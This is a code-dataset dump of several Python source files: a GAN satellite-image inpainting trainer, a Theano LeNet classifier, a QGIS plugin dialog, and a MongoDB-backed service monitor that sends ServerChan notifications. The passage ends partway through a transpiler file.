mode, it should not display images at xx display steps, but only save the model and\n #and losses during training\n cur_step += 1\n if self.config.run_polyaxon and epoch % 5 == 0:\n metrics = {}\n modelHelper.saveMetrics(metrics,'G_loss',generator_loss[-1],self.config.polyaxon_experiment,epoch)\n modelHelper.saveMetrics(metrics, 'G_BCE_loss', generator_loss_BCE[-1],self.config.polyaxon_experiment,epoch)\n modelHelper.saveMetrics(metrics,'D_loss',discriminator_loss[-1],self.config.polyaxon_experiment,epoch)\n modelHelper.saveMetrics(metrics, 'Disc guess on reals', disc_score_reals, self.config.polyaxon_experiment,epoch)\n modelHelper.saveMetrics(metrics, 'Disc guess on fakes', gen_score_fakes, self.config.polyaxon_experiment,\n epoch)\n modelHelper.saveMetrics(metrics, 'Updated disc guess on fakes', gen_score_fakes1, self.config.polyaxon_experiment,\n epoch)\n\n if epoch % self.save_model_step == 0 and self.trainMode == True:\n saveString = 'Epoch Number: ' + str(epoch) + ' Generator loss: ' + str(generator_loss[-1]) + '\\n' + 'Generator loss BCE: ' + str(generator_loss_BCE[-1]) + '\\n' + 'Discriminator loss: ' + str(discriminator_loss[-1]) + '\\n' + 'Disc guess on reals: ' + str(disc_score_reals) + ' Disc guess on fakes: ' + str(gen_score_fakes) + ' Updated disc guess on fakes: ' + str(gen_score_fakes1) + '\\n'\n modelHelper.saveToTxt(filename, saveString)\n name = str(self.modelName) + '_' + str(epoch)\n path_to_model = modelHelper.saveModel(name, self.modelOutputPath, gen, self.modelName)\n modelHelper.save_tensor_batch(real, fake_noise, fake_2, self.batchSize,\n Path.joinpath(self.ImageOutputPath, 'epoch_' + str(epoch)))\n elif epoch % self.save_error_step == 0 and self.trainMode == True:\n saveString = 'Epoch Number: ' + str(epoch) +'\\n' + ' Generator loss: ' + str(\n generator_loss[-1]) + '\\n' + 'Generator loss BCE: ' + str(\n generator_loss_BCE[-1]) + '\\n' + 'Discriminator loss: ' + str(\n discriminator_loss[-1]) + '\\n' + 'Disc guess on reals: ' + str(disc_score_reals) + ' Disc guess on fakes: ' + str(\n gen_score_fakes) + ' Updated disc guess on fakes: ' + str(gen_score_fakes1) + '\\n'\n modelHelper.saveToTxt(filename, saveString)\n return path_to_model\n\n\n# Kommer ikke til at du, da denne training phase, kører på random noise, og ikke på maskerede satelit billeder\n# https://docs.fast.ai/migrating_pytorch\n# device = torch.device(\"cuda:0\" if (torch.cuda.is_available() and numberGPU > 0) else \"cpu\")\n# learner = GANLearner.wgan(self.dataloader, self.generator, self.discriminator, opt_func=Adam, cbs=CudaCallback)\n##Using CudaCallBack if we use normal dataloaders, if we use fastAI, no need for this callback\n# learner.recorder.train_metrics = True #pas, bør returnere metrics for hvordan træningen gik?\n# learner.recorder.valid_metrics = False\n# learner.fit(self.epochs, self.lr) #wd? cbs?\n# learner.show_results(max_n=9, ds_idx=0)\n##Outputs\n# learner.predict(self.testImageDataloader) #At whatever index the test images is\n# learner.show_results()\n\n# Training\n# learner.save() Can save model and optimizer state\n# learner.load() load model and optimizer state\n\n def trainTemporalGAN(self):\n gen = self.generator().to(self.device)\n gen_opt = torch.optim.Adam(gen.parameters(), lr=self.lr, betas=(self.beta1, self.beta2))\n disc = self.discriminator().to(self.device)\n disc_opt = torch.optim.Adam(disc.parameters(), lr=self.lr, betas=(self.beta1, self.beta2))\n #display_step = 4\n criterionBCE = nn.BCELoss().cuda()\n criterionMSE = nn.MSELoss().cuda()\n #display_step = 5\n cur_step = 0\n\n discriminator_loss = []\n generator_loss = []\n generator_loss_BCE = []\n\n loadAndAgumentMasks = makeMasks.MaskClass(rand_seed=None)\n\n # måske nn.Conv2d med vægte ikke virker når vi bruger partconv2d, i så fald måske tilføje\n # or isinstance(m,partConv2d) og læg partconv2d et sted hvor den er accessible.\n def weights_init(m):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n if isinstance(m, nn.BatchNorm2d):\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n torch.nn.init.constant_(m.bias, 0)\n\n gen = gen.apply(weights_init)\n disc = disc.apply(weights_init)\n\n for epoch in range(self.epochs):\n # Dataloader returns the batches\n for temp0,temp1,temp2,temp3,temp4 in tqdm(self.dataloader):\n masks0 = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n # masksInverted = 1-masks\n # masksInverted = torch.from_numpy(masksInverted)\n # masksInverted = masksInverted.type(torch.cuda.FloatTensor)\n # masksInverted.to(self.device)\n masks0 = torch.from_numpy(masks0)\n masks0 = masks0.type(torch.cuda.FloatTensor)\n masks0 = 1 - masks0\n\n masks1 = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n masks1 = torch.from_numpy(masks1)\n masks1 = masks1.type(torch.cuda.FloatTensor)\n masks1 = 1 - masks1\n\n masks2 = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n masks2 = torch.from_numpy(masks2)\n masks2 = masks2.type(torch.cuda.FloatTensor)\n masks2 = 1 - masks2\n\n masks3 = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n masks3 = torch.from_numpy(masks3)\n masks3 = masks3.type(torch.cuda.FloatTensor)\n masks3 = 1 - masks3\n\n masks4 = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n masks4 = torch.from_numpy(masks4)\n masks4 = masks4.type(torch.cuda.FloatTensor)\n masks4 = 1 - masks4\n\n masks =torch.cat((masks0,masks1,masks2,masks3,masks4),1).to(self.device)\n real = torch.cat((temp0[0],temp1[0],temp2[0],temp3[0],temp4[0],),1).to(self.device)\n #real = real.to(self.device)\n #t = torch.cuda.get_device_properties(0).total_memory\n #c = torch.cuda.memory_cached(0)\n #a = torch.cuda.memory_allocated(0)\n #print(t)\n #print(c)\n #print(a)\n ## Update discriminator ##\n disc_opt.zero_grad()\n # lav om så den kører på masker\n fake_noise = torch.mul(real, masks)\n fake = gen(fake_noise, masks)\n disc_fake_pred = disc(fake.detach())\n disc_fake_loss = criterionBCE(disc_fake_pred, torch.zeros_like(disc_fake_pred))\n disc_real_pred = disc(real)\n disc_real_loss = criterionBCE(disc_real_pred, torch.ones_like(disc_real_pred))\n disc_loss = (disc_fake_loss + disc_real_loss) / 2\n\n # Keep track of the average discriminator loss\n discriminator_loss.append(disc_loss.item())\n # Update gradients\n disc_loss.backward(retain_graph=True)\n # Update optimizer\n disc_opt.step()\n\n ## Update generator ##\n gen_opt.zero_grad()\n # fake_noise_2 = real*masksInverted\n fake_2 = gen(fake_noise, masks)\n disc_fake_pred = disc(fake_2)\n gen_lossMSE = criterionMSE(real, fake_2)\n gen_loss_Adversarial = criterionBCE(disc_fake_pred, torch.ones_like(disc_real_pred))\n gen_loss = gen_lossMSE + gen_loss_Adversarial\n # få lavet en loss function, der penalizer pixels ændret udenfor maske\n # + regner MSE/L1 på alle pixels\n gen_loss.backward()\n gen_opt.step()\n\n # Keep track of the average generator loss\n generator_loss.append(gen_loss.item())\n generator_loss_BCE.append(gen_loss_Adversarial.item())\n\n ## Visualization code ##\n if cur_step % self.save_model_step == 0 and cur_step > 0 and self.trainMode == False:\n\n #if not training, it means we are messing around testing stuff, so no need to save model\n #and losses\n print(\n f\"Step {cur_step}: Generator loss: {gen_loss.item()}, discriminator loss: {disc_loss.item()}\")\n\n # Save loss from generator and discriminator to a file, and reset them, to avoid the list perpetually growing\n # Name of file = model name + batch_size +\n discriminator_loss = [sum(discriminator_loss) / len(discriminator_loss)]\n generator_loss = [sum(generator_loss) / len(generator_loss)]\n generator_loss_BCE = [sum(generator_loss_BCE) / len(generator_loss_BCE)]\n\n self.show_tensor_images(fake_2, real, fake_noise)\n\n #If in train mode, it should not display images at xx display steps, but only save the model and\n #and losses during training\n elif cur_step % self.save_model_step == 0 and cur_step > 0 and self.trainMode == True:\n #save model\n torch.save(gen.state_dict(),\n Path.joinpath(self.modelOutputPath, self.modelName + '_' + str(epoch) + '.pt'))\n\n # Save loss from generator and discriminator to a file, and reset them, to avoid the list perpetually growing\n # Name of file = model name + batch_size +\n discriminator_loss = [sum(discriminator_loss) / len(discriminator_loss)]\n generator_loss = [sum(generator_loss) / len(generator_loss)]\n generator_loss_BCE = [sum(generator_loss_BCE)/len(generator_loss_BCE)]\n self.saveToTxt(generator_loss_BCE, generator_loss_BCE, discriminator_loss)\n\n\n cur_step += 1\n","sub_path":"src/models/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":20753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"241015338","text":"from __future__ import print_function\n\nimport os\nimport sys\nimport timeit\n\nimport numpy\n\nimport math\n\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.signal import downsample\nfrom theano.tensor.nnet import conv2d\n\nfrom logistic_sgd import LogisticRegression, load_data, get_image_size, get_amount_of_classes\nfrom mlp import HiddenLayer\n\n# Initialize and create variables defined by user\n# First, image sizes and amount of classes\n\ndataset = '/Users/Aleksei/Desktop/testing_original'\nimage_x, image_y = get_image_size(dataset)\namount_classes = get_amount_of_classes(dataset)\n\n# Pooling size\npoolsize_x = 2\npoolsize_y = 2\n\n# Learning rate\n# Epochs to be trained and batch size\nuser_learning_rate = 0.0025\nuser_nepochs = 15\nuser_batch = 20\n#\n# # Size of the convolution filter windows\nuser_filter_x = 5\nuser_filter_y = 5\n\n# Treshhold for model training\nuser_treshhold = 0.995\n\nclass LeNetConvPoolLayer(object):\n \"\"\"Pool Layer of a convolutional network \"\"\"\n\n def __init__(self, rng, input, filter_shape, image_shape, poolsize=(poolsize_x, poolsize_y)):\n global poolsize_x\n global poolsize_y\n global image_x\n global image_y\n global amount_classes\n global user_learning_rate\n global user_nepochs\n global user_batch\n global user_filter_x\n global user_filter_y\n global user_treshold\n \"\"\"\n Allocate a LeNetConvPoolLayer with shared variable internal parameters.\n \"\"\"\n assert image_shape[1] == filter_shape[1]\n self.input = input\n\n fan_in = numpy.prod(filter_shape[1:])\n\n fan_out = (filter_shape[0] * numpy.prod(filter_shape[2:]) //\n numpy.prod(poolsize))\n\n # initialize weights with random weights\n W_bound = numpy.sqrt(6. / (fan_in + fan_out))\n self.W = theano.shared(\n numpy.asarray(\n rng.uniform(low=-W_bound, high=W_bound, size=filter_shape),\n dtype=theano.config.floatX\n ),\n borrow=True\n )\n\n b_values = numpy.zeros((filter_shape[0],), dtype=theano.config.floatX)\n self.b = theano.shared(value=b_values, borrow=True)\n\n # convolve input feature maps with filters\n conv_out = conv2d(\n input=input,\n filters=self.W,\n filter_shape=filter_shape,\n input_shape=image_shape\n )\n\n # downsample each feature map individually, using maxpooling\n pooled_out = downsample.max_pool_2d(\n input=conv_out,\n ds=poolsize,\n ignore_border=True\n )\n\n #reshape bias to a tensor\n self.output = T.tanh(pooled_out + self.b.dimshuffle('x', 0, 'x', 'x'))\n\n # parameters of the current layer\n self.params = [self.W, self.b]\n\n # model input\n self.input = input\n\n\n\n\n\ndef evaluate_lenet5(learning_rate=user_learning_rate, n_epochs=user_nepochs,\n dataset='/Users/Aleksei/Desktop/testing_original',\n nkerns=[20, 50], batch_size=user_batch):\n \"\"\" Calculates the model. If you want to modify the variables further, they are of the following format:\n learning_rate: float\n n_epochs: int\n dataset: string\n nkerns: list of ints\n \"\"\"\n\n rng = numpy.random.RandomState(23455)\n\n datasets = load_data(dataset)\n\n train_set_x, train_set_y = datasets[0]\n valid_set_x, valid_set_y = datasets[1]\n test_set_x, test_set_y = datasets[2]\n\n # calculate the mini batches number for the three stages\n n_train_batches = train_set_x.get_value(borrow=True).shape[0]\n n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]\n n_test_batches = test_set_x.get_value(borrow=True).shape[0]\n n_train_batches //= batch_size\n n_valid_batches //= batch_size\n n_test_batches //= batch_size\n\n index = T.lscalar()\n\n x = T.matrix('x') # the data is presented as a matrix of RGB of pixels\n y = T.ivector('y') # the labels are presented as 1D vector of integers\n\n ####################\n # BUILD THE MODEL #\n ####################\n print('... building the model')\n\n # Reshape the matrix to appropriate size.\n layer0_input = x.reshape((batch_size, 1, image_x, image_y))\n\n # Construct the first convolutional pooling layer\n layer0 = LeNetConvPoolLayer(\n rng,\n input=layer0_input,\n image_shape=(batch_size, 1, image_x, image_y),\n filter_shape=(nkerns[0], 1, user_filter_x, user_filter_y),\n poolsize=(poolsize_x, poolsize_y)\n )\n\n # Construct the further convolutional layers of the amount defined by user\n layer1 = LeNetConvPoolLayer(\n rng,\n input=layer0.output,\n image_shape=(batch_size, nkerns[0], math.floor((image_x - user_filter_x + 1) / poolsize_x),\n math.floor((image_y - user_filter_y + 1) / poolsize_y)),\n filter_shape=(nkerns[1], nkerns[0], user_filter_x, user_filter_y),\n poolsize=(poolsize_x, poolsize_y)\n )\n image_x_1 = math.floor((image_x - user_filter_x + 1) / poolsize_x)\n image_y_1 = math.floor((image_y - user_filter_y + 1) / poolsize_y)\n\n # create the Hidden layer from the output of previous layers\n layer2_input = layer1.output.flatten(2)\n\n # construct a fully-connected sigmoidal layer\n layer2 = HiddenLayer(\n rng,\n input=layer2_input,\n n_in=nkerns[1] * int(math.floor((image_x_1 - user_filter_x + 1) / poolsize_x)) * int(\n math.floor((image_y_1 - user_filter_y + 1) / poolsize_y)),\n n_out=batch_size,\n activation=T.tanh\n )\n\n # classify the values of the fully-connected sigmoidal layer\n layer3 = LogisticRegression(input=layer2.output, n_in=batch_size, n_out=amount_classes)\n\n # the cost evaluates the accuracy of the model\n cost = layer3.negative_log_likelihood(y)\n\n # test and validate the model\n test_model = theano.function(\n [index],\n layer3.errors(y),\n givens={\n x: test_set_x[index * batch_size: (index + 1) * batch_size],\n y: test_set_y[index * batch_size: (index + 1) * batch_size]\n }\n )\n\n validate_model = theano.function(\n [index],\n layer3.errors(y),\n givens={\n x: valid_set_x[index * batch_size: (index + 1) * batch_size],\n y: valid_set_y[index * batch_size: (index + 1) * batch_size]\n }\n )\n\n params = layer3.params + layer2.params + layer1.params + layer0.params\n\n grads = T.grad(cost, params)\n\n updates = [\n (param_i, param_i - learning_rate * grad_i)\n for param_i, grad_i in zip(params, grads)\n ]\n\n train_model = theano.function(\n [index],\n cost,\n updates=updates,\n givens={\n x: train_set_x[index * batch_size: (index + 1) * batch_size],\n y: train_set_y[index * batch_size: (index + 1) * batch_size]\n }\n )\n\n ###############\n # TRAIN MODEL #\n ###############\n print('... training')\n patience = 10000\n patience_increase = 2 # time between iterations\n improvement_threshold = user_treshhold # result is considered to be better if improved by this K\n validation_frequency = min(n_train_batches, patience // 2)\n\n best_validation_loss = numpy.inf\n best_iter = 0\n test_score = 0.\n start_time = timeit.default_timer()\n\n epoch = 0\n done_looping = False\n\n while (epoch < n_epochs) and (not done_looping):\n epoch = epoch + 1\n for minibatch_index in range(n_train_batches):\n\n iter = (epoch - 1) * n_train_batches + minibatch_index\n\n if iter % 100 == 0:\n print('training @ iter = ', iter)\n cost_ij = train_model(minibatch_index)\n\n if (iter + 1) % validation_frequency == 0:\n\n # compute zero-one loss on validation set\n validation_losses = [validate_model(i) for i\n in range(n_valid_batches)]\n this_validation_loss = numpy.mean(validation_losses)\n print('epoch %i, minibatch %i/%i, validation error %f %%' %\n (epoch, minibatch_index + 1, n_train_batches,\n this_validation_loss * 100.))\n # test if the current validation score is better than the best. save if it is.\n if this_validation_loss < best_validation_loss:\n\n if this_validation_loss < best_validation_loss * \\\n improvement_threshold:\n patience = max(patience, iter * patience_increase)\n\n best_validation_loss = this_validation_loss\n best_iter = iter\n\n test_losses = [\n test_model(i)\n for i in range(n_test_batches)\n ]\n test_score = numpy.mean(test_losses)\n print((' epoch %i, minibatch %i/%i, test error of '\n 'best model %f %%') %\n (epoch, minibatch_index + 1, n_train_batches,\n test_score * 100.))\n\n if patience <= iter:\n done_looping = True\n break\n\n end_time = timeit.default_timer()\n print('Optimization complete.')\n print('Best validation score of %f %% obtained at iteration %i, '\n 'with test performance %f %%' %\n (best_validation_loss * 100., best_iter + 1, test_score * 100.))\n print(('The code for file ' +\n os.path.split(__file__)[1] +\n ' ran for %.2fm' % ((end_time - start_time) / 60.)), file=sys.stderr)\n\n\nif __name__ == '__main__':\n evaluate_lenet5()\n\n\ndef experiment(state, channel):\n evaluate_lenet5(state.learning_rate, dataset=state.dataset)","sub_path":"convolutional_mlp.py","file_name":"convolutional_mlp.py","file_ext":"py","file_size_in_byte":9802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"204273846","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n CreateProjectDialog\n A QGIS plugin\n Gestion de Plans d'Aménagement Général du Grand-Duché de Luxembourg\n -------------------\n begin : 2015-09-09\n git sha : $Format:%H$\n copyright : (C) 2015 by arx iT\n email : mba@arxit.com\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\"\"\"\n\nimport os\n\nfrom PyQt4 import QtGui, uic\nfrom PyQt4.QtGui import QFileDialog, QMessageBox\nfrom PyQt4.QtCore import QCoreApplication\n\nimport PagLuxembourg.main\n\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\n os.path.dirname(__file__), 'create_project_dialog.ui'))\n\n\nclass CreateProjectDialog(QtGui.QDialog, FORM_CLASS):\n def __init__(self, parent=None):\n '''\n Constructor.\n '''\n \n super(CreateProjectDialog, self).__init__(parent)\n # Set up the user interface from Designer.\n # After setupUI you can access any designer object by doing\n # self., and you can use autoconnect slots - see\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\n # #widgets-and-dialogs-with-auto-connect\n self.setupUi(self)\n\n def showFolderList(self):\n '''\n Display the project folder selection dialog\n '''\n \n dialog = QFileDialog()\n dialog.setFileMode(QFileDialog.Directory)\n dialog.setOption(QFileDialog.ShowDirsOnly)\n dialog.setWindowTitle(QCoreApplication.translate('CreateProject','Select the new project location'))\n dialog.setSizeGripEnabled(False)\n result = dialog.exec_()\n \n if result == 0:\n return\n \n selected_files = dialog.selectedFiles()\n \n if len(selected_files)==0:\n return\n \n self.txtProjectFolder.setText(selected_files[0])\n \n def clear(self):\n '''\n Clears the text boxes\n '''\n \n self.txtProjectName.setText('')\n self.txtProjectFolder.setText('')\n \n def accept(self):\n '''\n Dialog accept action (OK)\n '''\n \n folder = self.txtProjectFolder.text()\n name = self.txtProjectName.text()\n \n # No project name\n if len(name)==0:\n QMessageBox.critical(self, \n QCoreApplication.translate('CreateProject','Error'),\n QCoreApplication.translate('CreateProject','Please type a project name'))\n \n # Project folder error\n if not os.path.exists(folder):\n QMessageBox.critical(self, \n QCoreApplication.translate('CreateProject','Error'),\n QCoreApplication.translate('CreateProject','The folder does not exist'))\n \n PagLuxembourg.main.current_project.create(folder,name)\n \n self.close()","sub_path":"widgets/create_project/create_project_dialog.py","file_name":"create_project_dialog.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291160380","text":"import sys\nimport signal\nimport logging.config\nimport time\n\nimport arrow\nimport pymongo\nimport datetime\nimport requests\nimport log4mongo.handlers\n\nfrom .tasks import Task\nfrom .constant import *\n\n__all__ = [\n 'Monitor'\n]\na = 0\n\n\nclass Monitor(object):\n \"\"\"\n\n \"\"\"\n name = 'slavem'\n\n def __init__(self, host='localhost', port=27017, dbn='slavem', username=None, password=None, serverChan=None,\n loggingconf=None):\n \"\"\"\n :param host:\n :param port:\n :param dbn:\n :param username:\n :param password:\n :param serverChan:\n :param loggingconf: logging 的配置 Dict()\n \"\"\"\n\n self.mongoSetting = {\n 'host': host,\n 'port': port,\n 'dbn': dbn,\n 'username': username,\n 'password': password,\n }\n\n self.log = logging.getLogger()\n self.initLog(loggingconf)\n\n # serverChan 的汇报地址\n self.serverChan = serverChan or {}\n if self.serverChan:\n for account, url in self.serverChan.items():\n serverChanUrl = requests.get(url).text\n self.serverChan[account] = serverChanUrl\n else:\n print(u'没有配置 serverChan 的 url')\n\n\n self.mongourl = 'mongodb://{username}:{password}@{host}:{port}/{dbn}?authMechanism=SCRAM-SHA-1'.format(\n **self.mongoSetting)\n\n self.__active = False\n self._inited = False\n\n # 下次查看是否已经完成任务的时间\n self.nextWatchTime = arrow.now()\n\n # 关闭服务的信号\n for sig in [signal.SIGINT, # 键盘中 Ctrl-C 组合键信号\n signal.SIGHUP, # nohup 守护进程发出的关闭信号\n signal.SIGTERM, # 命令行数据 kill pid 时的信号\n ]:\n signal.signal(sig, self.shutdown)\n\n self.authed = False\n\n def initLog(self, loggingconf):\n \"\"\"\n 初始化日志\n :param loggingconf:\n :return:\n \"\"\"\n if loggingconf:\n # log4mongo 的bug导致使用非admin用户时,建立会报错。\n # 这里使用注入的方式跳过会报错的代码\n log4mongo.handlers._connection = pymongo.MongoClient(\n host=loggingconf['handlers']['mongo']['host'],\n port=loggingconf['handlers']['mongo']['port'],\n )\n\n logging.config.dictConfig(loggingconf)\n self.log = logging.getLogger(self.name)\n\n else:\n self.log = logging.getLogger()\n self.log.setLevel('DEBUG')\n fmt = \"%(asctime)-15s %(levelname)s %(filename)s %(lineno)d %(process)d %(message)s\"\n # datefmt = \"%a-%d-%b %Y %H:%M:%S\"\n datefmt = None\n formatter = logging.Formatter(fmt, datefmt)\n sh = logging.StreamHandler(sys.stdout)\n sh.setFormatter(formatter)\n sh.setLevel('DEBUG')\n self.log.addHandler(sh)\n\n sh = logging.StreamHandler(sys.stderr)\n sh.setFormatter(formatter)\n sh.setLevel('WARN')\n self.log.addHandler(sh)\n self.log.warn(u'未配置 loggingconfig')\n\n @property\n def db(self):\n return self.mongoclient[self.mongoSetting['dbn']]\n\n @property\n def taskCollectionName(self):\n return 'task'\n\n @property\n def reportCollectionName(self):\n return 'report'\n\n def dbConnect(self):\n \"\"\"\n 建立数据库链接\n :return:\n \"\"\"\n try:\n # 检查链接是否正常\n self.mongoclient.server_info()\n except:\n # 重新链接\n self.mongoclient = pymongo.MongoClient(\n host=self.mongoSetting['host'],\n port=self.mongoSetting['port']\n )\n if self.mongoSetting.get('username'):\n # self.mongoclient = pymongo.MongoClient(self.mongourl)\n self.authed = self.db.authenticate(\n self.mongoSetting['username'],\n self.mongoSetting['password']\n )\n\n def init(self):\n \"\"\"\n 初始化服务\n :return:\n \"\"\"\n self._inited = True\n\n # 建立数据库链接\n self.dbConnect()\n\n # 从数据库加载任务\n self.loadTask()\n\n # 对任务进行排序\n self.sortTask()\n\n # 最后更新任务时间\n self.refreshWatchTime()\n\n def _run(self):\n \"\"\"\n\n :return:\n \"\"\"\n # 下次任务时间\n self.reportWatchTime()\n\n while self.__active:\n now = arrow.now()\n if now < self.nextWatchTime:\n time.sleep(1)\n continue\n\n self.log.info(u'达到截止时间')\n\n # 检查任务\n self.checkTask()\n\n # 任务排序\n self.sortTask()\n\n # 最后更新任务时间\n self.refreshWatchTime()\n\n # 下次任务时间\n self.reportWatchTime()\n\n def reportWatchTime(self):\n \"\"\"\n 下次任务的时间\n :return:\n \"\"\"\n now = arrow.now()\n if now < self.nextWatchTime:\n # 还没到观察下一个任务的时间\n rest = self.nextWatchTime - now\n self.log.info(u'下次截止时间 {}'.format(self.nextWatchTime))\n # time.sleep(rest.total_seconds())\n # self.log.info(u'达到截止时间')\n\n def start(self):\n \"\"\"\n\n :return:\n \"\"\"\n self.init()\n\n self.__active = True\n try:\n self._run()\n except Exception as e:\n print(e.message)\n self.log.critical(e.message)\n self.stop()\n\n def stop(self):\n \"\"\"\n 关闭服务\n :return:\n \"\"\"\n self.__active = False\n self.log.info(u'服务即将关闭……')\n\n def shutdown(self, signalnum, frame):\n \"\"\"\n 处理 signal 信号触发的结束服务信号\n :param signalnum:\n :param frame:\n :return:\n \"\"\"\n self.stop()\n\n def __del__(self):\n \"\"\"\n 实例释放时的处理\n :param exc_type:\n :param exc_val:\n :param exc_tb:\n :return:\n \"\"\"\n try:\n if self.authed:\n self.db.logout()\n self.mongoclient.close()\n except:\n pass\n\n def loadTask(self):\n \"\"\"\n 加载所有任务\n :return:\n \"\"\"\n # 读取任务\n taskCol = self.db[self.taskCollectionName]\n taskList = []\n for t in taskCol.find():\n if t.get('off'):\n continue\n t.pop('_id')\n taskList.append(Task(**t))\n\n self.tasks = taskList\n self.log.info(u'加载了 {} 个任务'.format(len(self.tasks)))\n if __debug__:\n for t in self.tasks:\n self.log.debug(str(t))\n\n def sortTask(self):\n \"\"\"\n 对任务进行排序\n :return:\n \"\"\"\n self.tasks.sort(key=lambda x: x.deadline)\n\n def refreshWatchTime(self):\n \"\"\"\n\n :return:\n \"\"\"\n try:\n t = self.tasks[0]\n self.nextWatchTime = t.deadline\n except IndexError:\n # 如果没有任务,那么下次检查时间就是1分钟后\n self.nextWatchTime = arrow.now() + datetime.timedelta(seconds=60)\n return\n\n def checkTask(self):\n \"\"\"\n 有任务达到检查时间了,开始检查任务\n :return:\n \"\"\"\n # 获取所有 deadline 时间到的任务实例\n\n taskList = []\n firstLanuchTime = None\n now = arrow.now()\n for t in self.tasks:\n assert isinstance(t, Task)\n if now >= t.deadline:\n taskList.append(t)\n try:\n # 最早开始的一个任务\n if firstLanuchTime < t.lanuchTime:\n firstLanuchTime = t.lanuchTime\n except TypeError:\n firstLanuchTime = t.lanuchTime\n\n self.log.info(u'查询启动报告时间 > {}'.format(firstLanuchTime))\n\n # 查询 >firstLanuchTime 的启动报告\n sql = {\n 'datetime': {\n '$gte': firstLanuchTime,\n }\n }\n\n reportCol = self.db[self.reportCollectionName]\n cursor = reportCol.find(sql)\n\n if __debug__:\n self.log.debug(u'查询到 {} 条报告'.format(cursor.count()))\n\n # 核对启动报告\n for report in cursor:\n for t in taskList:\n assert isinstance(t, Task)\n if t.isReport(report):\n # 完成了,刷新deadline\n self.log.info(u'{} 服务启动完成 {}'.format(t.name, t.lanuchTime))\n if t.isLate:\n # 迟到的启动报告, 也需要发通知\n self.noticeDealyReport(t)\n t.finishAndRefresh()\n taskList.remove(t)\n break\n\n # 未能准时启动的服务\n for t in taskList:\n if t.isTimeToNoticeDelay():\n self.noticeUnreport(t)\n t.refreshLastDelayNoticeTime()\n\n # 设置为启动迟到\n t.setLate()\n # 未完成,将 deadline 延迟到1分钟后\n t.delayDeadline()\n\n def noticeDealyReport(self, task):\n \"\"\"\n\n :param task: tasks.Task\n :param report: dict()\n :return:\n \"\"\"\n # 通知:任务延迟完成了\n text = u'服务{name}启动迟到'.format(name=task.name)\n desp = u'当前时间:{}'.format(arrow.now())\n\n for k, v in task.toNotice().items():\n desp += u'\\n\\n{}\\t:{}'.format(k, v)\n\n self.sendServerChan(text, desp)\n\n def noticeUnreport(self, task):\n \"\"\"\n :param task: tasks.Task\n :return:\n \"\"\"\n # 通知:未收到任务完成通知\n text = u'服务{name}未启动'.format(name=task.name)\n desp = u'当前时间\\t:{}'.format(arrow.now())\n\n for k, v in task.toNotice().items():\n desp += u'\\n\\n{}\\t:{}'.format(k, v)\n\n self.sendServerChan(text, desp)\n\n def sendServerChan(self, text, desp):\n \"\"\"\n\n :return:\n \"\"\"\n for account, serverChanUrl in self.serverChan.items():\n url = serverChanUrl.format(text=text, desp=desp)\n while True:\n r = requests.get(url)\n if r.status_code == 200:\n # 发送异常,重新发送\n break\n self.log.warning(u'向serverChan发送信息异常 code:{}'.format(r.status_code))\n time.sleep(10)\n\n self.log.info(u'向 {} 发送信息 '.format(account))\n\n def createTask(self, **kwargs):\n \"\"\"\n 创建任务\n :param kwargs:\n :return:\n \"\"\"\n newTask = Task(**kwargs)\n\n sql = newTask.toSameTaskKV()\n dic = newTask.toMongoDB()\n\n self.db.task.update_one(sql, {'$set': dic}, upsert=True)\n # self.db.task.find_one_and_update(sql, {'$set': dic}, upsert=True)\n self.log.info(u'创建了task {}'.format(str(dic)))\n\n def showTask(self):\n \"\"\"\n\n :return:\n \"\"\"\n for t in self.tasks:\n print(t.toMongoDB())\n","sub_path":"slavem/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":11559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"534680044","text":"from typing import Dict, List, Tuple\nfrom types import MappingProxyType\nfrom collections import OrderedDict\nimport transpilers.OmegaTranspiler as OmegaTranspiler\n\n\nfrom pdb import set_trace\n\n\nclass Python3Transpiler(OmegaTranspiler.OmegaTranspiler):\n\n # TODO: Rewrite to use a method to generate all the strings. In particular, allow for user defined formatting.\n # TODO: Allow for object and static methods\n # TODO: Allow for static variables\n @staticmethod\n def emit_class(class_name: str, class_description: Dict) -> str:\n string_list = [\n \"class {}:\\n\\n\".format(class_name)\n ]\n\n arguments = OrderedDict({\n \"self\": {\n \"static\": False\n }\n })\n\n arguments.update(class_description[\"variables\"])\n\n init_string = Python3Transpiler.emit_function(\"__init__\", arguments, (\" \", []),\n leave_empty=True)\n\n string_list.append(init_string)\n string_list.extend(map(lambda x: \" self.{} = {}\\n\".format(x, x), class_description[\"variables\"]))\n class_string = \"\".join(string_list)\n\n return class_string\n\n @staticmethod\n def emit_function(function_name: str, arguments: Dict,\n language_specific: Tuple[str, List],\n leave_empty: bool=False,\n is_static: bool=False,\n func_format: str=\"default\",\n arg_format: str=\"default\",\n documentation: str= \"\",\n return_type: str = None) -> str:\n\n prefix, decorators = language_specific\n\n if is_static:\n decorators.insert(0, \"@staticmethod\")\n\n decorator_strings = map(lambda x: \"{}@{}\\n\".format(prefix, x), decorators)\n\n string_list = [\n \"{}def {}(\".format(prefix, function_name)\n ] # type: List[str]\n\n argument_strings = [] # type: List[str]\n\n for arg in arguments:\n if \"type\" 